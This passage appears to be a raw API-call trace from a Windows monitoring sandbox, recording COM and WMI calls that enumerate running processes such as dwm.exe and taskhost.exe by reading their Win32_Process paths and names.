[4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.062] IUnknown:AddRef (This=0x595138) returned 0x3 [0279.062] IUnknown:QueryInterface (in: This=0x595138, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.062] IUnknown:QueryInterface (in: This=0x595138, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.062] IUnknown:QueryInterface (in: This=0x595138, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x59513c) returned 0x0 [0279.062] IMarshal:GetUnmarshalClass (in: This=0x59513c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.062] IUnknown:Release (This=0x59513c) returned 0x3 [0279.062] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.063] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.063] IUnknown:QueryInterface (in: This=0x595138, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.063] IUnknown:Release (This=0x595138) returned 0x2 [0279.063] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.063] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.063] IUnknown:QueryInterface (in: This=0x595138, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x595138) returned 0x0 [0279.063] IUnknown:AddRef (This=0x595138) returned 0x4 [0279.063] IUnknown:Release (This=0x595138) returned 0x3 [0279.063] IUnknown:Release (This=0x595138) returned 0x2 [0279.063] CoTaskMemFree (pv=0x56ea060) [0279.063] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.063] IUnknown:AddRef (This=0x595138) returned 0x3 [0279.063] IWbemClassObject:Get (in: This=0x595138, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.063] IWbemClassObject:Get (in: This=0x595138, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1052\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.064] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1052\"") returned 0x66 [0279.064] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1052\"") returned 0x66 [0279.064] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.064] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.064] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.064] IUnknown:Release (This=0x500344) returned 0x1 [0279.064] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56ea060) returned 0x0 [0279.065] WbemDefPath:IUnknown:QueryInterface (in: This=0x56ea060, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.065] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56ea060, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5a9338) returned 0x0 [0279.065] WbemDefPath:IUnknown:Release (This=0x56ea060) returned 0x0 [0279.065] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9338, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5a9338) returned 0x0 [0279.065] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9338, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.065] WbemDefPath:IUnknown:AddRef (This=0x5a9338) returned 0x3 [0279.065] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9338, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.065] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9338, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.065] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9338, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56ea070) returned 0x0 [0279.065] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56ea070, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.065] WbemDefPath:IUnknown:Release (This=0x56ea070) returned 0x3 [0279.065] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.066] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.066] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9338, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.066] WbemDefPath:IUnknown:Release (This=0x5a9338) returned 0x2 [0279.066] WbemDefPath:IUnknown:Release (This=0x5a9338) returned 0x1 [0279.066] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.066] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.066] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9338, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5a9338) returned 0x0 [0279.066] WbemDefPath:IUnknown:AddRef (This=0x5a9338) returned 0x3 [0279.066] WbemDefPath:IUnknown:Release (This=0x5a9338) returned 0x2 [0279.066] WbemDefPath:IWbemPath:SetText (This=0x5a9338, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1052\"") returned 0x0 [0279.066] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.066] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.066] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.066] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.066] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.066] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.066] IWbemClassObject:Get (in: This=0x595138, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27bd52c*=0, plFlavor=0x27bd530*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="dwm.exe", varVal2=0x0), pType=0x27bd52c*=8, plFlavor=0x27bd530*=0) returned 0x0 [0279.066] SysStringByteLen (bstr="dwm.exe") returned 0xe [0279.066] SysStringByteLen (bstr="dwm.exe") returned 0xe [0279.066] IWbemClassObject:Get (in: This=0x595138, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27bd52c*=8, plFlavor=0x27bd530*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="dwm.exe", varVal2=0x0), pType=0x27bd52c*=8, plFlavor=0x27bd530*=0) returned 0x0 [0279.066] SysStringByteLen (bstr="dwm.exe") returned 0xe [0279.066] SysStringByteLen (bstr="dwm.exe") returned 0xe [0279.067] CoTaskMemAlloc (cb=0x4) returned 0x56ea0a0 [0279.067] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56ea0a0, puReturned=0x27bb39c | out: apObjects=0x56ea0a0*=0x5952d0, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.067] IUnknown:QueryInterface (in: This=0x5952d0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5952d0) returned 0x0 [0279.068] IUnknown:QueryInterface (in: This=0x5952d0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.068] IUnknown:QueryInterface (in: This=0x5952d0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.068] IUnknown:AddRef (This=0x5952d0) returned 0x3 [0279.068] IUnknown:QueryInterface (in: This=0x5952d0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.068] IUnknown:QueryInterface (in: This=0x5952d0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.068] IUnknown:QueryInterface (in: This=0x5952d0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5952d4) returned 0x0 [0279.068] IMarshal:GetUnmarshalClass (in: This=0x5952d4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.068] IUnknown:Release (This=0x5952d4) returned 0x3 [0279.068] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.068] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.068] IUnknown:QueryInterface (in: This=0x5952d0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.068] IUnknown:Release (This=0x5952d0) returned 0x2 [0279.068] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.068] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.068] IUnknown:QueryInterface (in: This=0x5952d0, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5952d0) returned 0x0 [0279.068] IUnknown:AddRef (This=0x5952d0) returned 0x4 [0279.068] IUnknown:Release (This=0x5952d0) returned 0x3 [0279.069] IUnknown:Release (This=0x5952d0) returned 0x2 [0279.069] CoTaskMemFree (pv=0x56ea0a0) [0279.069] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.069] IUnknown:AddRef (This=0x5952d0) returned 0x3 [0279.069] IWbemClassObject:Get (in: This=0x5952d0, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.069] IWbemClassObject:Get (in: This=0x5952d0, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1288\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.069] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1288\"") returned 0x66 [0279.069] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1288\"") returned 0x66 [0279.069] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.069] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.069] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.069] IUnknown:Release (This=0x500344) returned 0x1 [0279.070] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56ea0a0) returned 0x0 [0279.070] WbemDefPath:IUnknown:QueryInterface (in: This=0x56ea0a0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.071] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56ea0a0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5a9418) returned 0x0 [0279.071] WbemDefPath:IUnknown:Release (This=0x56ea0a0) returned 0x0 [0279.071] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9418, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5a9418) returned 0x0 [0279.071] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9418, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.071] WbemDefPath:IUnknown:AddRef (This=0x5a9418) returned 0x3 [0279.071] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9418, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.071] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9418, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.071] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9418, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56ea0b0) returned 0x0 [0279.071] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56ea0b0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.071] WbemDefPath:IUnknown:Release (This=0x56ea0b0) returned 0x3 [0279.071] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.071] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.071] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9418, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.071] WbemDefPath:IUnknown:Release (This=0x5a9418) returned 0x2 [0279.071] WbemDefPath:IUnknown:Release (This=0x5a9418) returned 0x1 [0279.071] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.071] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.072] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9418, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5a9418) returned 0x0 [0279.072] WbemDefPath:IUnknown:AddRef (This=0x5a9418) returned 0x3 [0279.072] WbemDefPath:IUnknown:Release (This=0x5a9418) returned 0x2 [0279.072] WbemDefPath:IWbemPath:SetText (This=0x5a9418, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1288\"") returned 0x0 [0279.072] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.072] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.072] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.072] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.072] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.072] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.072] IWbemClassObject:Get (in: This=0x5952d0, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27bdd88*=0, plFlavor=0x27bdd8c*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="taskhost.exe", varVal2=0x0), pType=0x27bdd88*=8, plFlavor=0x27bdd8c*=0) returned 0x0 [0279.072] SysStringByteLen (bstr="taskhost.exe") returned 0x18 [0279.072] SysStringByteLen (bstr="taskhost.exe") returned 0x18 [0279.072] IWbemClassObject:Get (in: This=0x5952d0, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27bdd88*=8, plFlavor=0x27bdd8c*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="taskhost.exe", varVal2=0x0), pType=0x27bdd88*=8, plFlavor=0x27bdd8c*=0) returned 0x0 [0279.072] SysStringByteLen (bstr="taskhost.exe") returned 0x18 [0279.072] SysStringByteLen (bstr="taskhost.exe") returned 0x18 [0279.072] CoTaskMemAlloc (cb=0x4) returned 0x56ea0e0 [0279.072] IEnumWbemClassObject:Next (in: 